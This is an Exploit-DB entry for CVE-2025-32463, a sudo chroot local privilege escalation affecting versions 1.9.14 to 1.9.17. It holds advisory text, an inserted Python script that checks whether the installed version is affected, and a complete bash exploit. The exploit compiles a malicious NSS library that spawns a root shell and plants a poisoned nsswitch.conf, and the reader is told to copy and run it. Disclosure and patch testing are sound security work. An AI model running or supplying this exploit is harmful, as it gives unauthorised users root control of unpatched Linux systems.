Sudo chroot 1.9.17 - Local Privilege Escalation

EDB-ID: 52352

Platform: Linux

Date: 2025-07-08


Exploit Title: Sudo chroot 1.9.17 - Local Privilege Escalation
Google Dork: not applicable
Date: Mon, 30 Jun 2025
Exploit Author: Stratascale
Vendor Homepage: https://salsa.debian.org/sudo-team/sudo
Software Link:
Version: Sudo versions 1.9.14 to 1.9.17 inclusive
Tested on: Kali Rolling 2025-7-3
CVE: CVE-2025-32463

*Version running today in Kali:*
https://pkg.kali.org/news/640802/sudo-1916p2-2-imported-into-kali-rolling/

*Background*

An attacker can leverage sudo's -R (--chroot) option to run
arbitrary commands as root, even if they are not listed in the
sudoers file.

Sudo versions affected:

    Sudo versions 1.9.14 to 1.9.17 inclusive are affected.

CVE ID:

    This vulnerability has been assigned CVE-2025-32463 in the
    Common Vulnerabilities and Exposures database.

Details:

    Sudo's -R (--chroot) option is intended to allow the user to
    run a command with a user-selected root directory if the sudoers
    file allows it.  A change was made in sudo 1.9.14 to resolve
    paths via chroot() using the user-specified root directory while
    the sudoers file was still being evaluated.  It is possible for
    an attacker to trick sudo into loading an arbitrary shared
    library by creating an /etc/nsswitch.conf file under the
    user-specified root directory.

    The change from sudo 1.9.14 has been reverted in sudo 1.9.17p1
    and the chroot feature has been marked as deprecated.  It will
    be removed entirely in a future sudo release.  Because of the
    way sudo resolves commands, supporting a user-specified chroot
    directory is error-prone and this feature does not appear to
    be widely used.

    A more detailed description of the bug and its effects can be
    found in the Stratascale advisory:
    https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot

Impact:

    On systems that support /etc/nsswitch.conf a user may be able
    to run arbitrary commands as root.
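A defender-side check for the affected range stated above, added here as an example and not part of the Stratascale advisory or the PoC: it parses the first line of `sudo --version` (handling the `p` patch level so that 1.9.17p1 is recognised as fixed) and reports whether the upstream version falls inside 1.9.14 to 1.9.17. The function and constant names are my own.

```python
import re
import subprocess

# Affected range from the advisory: 1.9.14 through 1.9.17 inclusive;
# the chroot() change was reverted in 1.9.17p1.
FIRST_AFFECTED = (1, 9, 14, 0)
FIRST_FIXED = (1, 9, 17, 1)

# Upstream sudo versions look like "1.9.16p2": three numbers plus an
# optional "p<n>" patch level.
_VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)(?:p(\d+))?\b")


def parse_sudo_version(text):
    """Return (major, minor, patch, plevel) from a bare version string or
    from the first line of `sudo --version` ("Sudo version 1.9.16p2").
    A missing patch level counts as 0 so that 1.9.17 sorts before 1.9.17p1."""
    match = _VERSION_RE.search(text)
    if not match:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, patch, plevel = match.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def is_affected(text):
    """True when the upstream version falls inside the affected range.
    Caveat: distributions often backport the fix without changing the
    upstream version number, so True means "check the vendor advisory",
    not "confirmed vulnerable"."""
    version = parse_sudo_version(text)
    return FIRST_AFFECTED <= version < FIRST_FIXED


def installed_sudo_version_line():
    """First line of `sudo --version` on this host (needs no privileges)."""
    result = subprocess.run(["sudo", "--version"], capture_output=True,
                            text=True, check=True)
    return result.stdout.splitlines()[0]


if __name__ == "__main__":
    line = installed_sudo_version_line()
    state = "inside" if is_affected(line) else "outside"
    print(f"{line}: {state} the affected range for CVE-2025-32463")
```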

*Exploit:*

*Verify the sudo version running: sudo --version. If it is vulnerable, copy and
paste the following code and run it.*
*----------------------*
#!/bin/bash
# sudo-chwoot.sh – PoC CVE-2025-32463
set -e

STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"

# 1. NSS library
cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor))
void woot(void) {
    setreuid(0,0);          /* change to UID 0 */
    setregid(0,0);          /* change to GID 0 */
    chdir("/");             /* exit from chroot */
    execl("/bin/bash","/bin/bash",NULL); /* root shell */
}
EOF

# 2. Mini chroot with toxic nsswitch.conf
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc            # make getgrnam() not fail

# 3. compile libnss_
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "[*] Running exploit…"
sudo -R woot woot                 # (-R <dir> <cmd>)
                                   # • the first "woot" is the chroot directory
                                   # • the second "woot" is a nonexistent
                                   #   command (sudo only needs to resolve the user)

rm -rf "$STAGE"
*----------------------*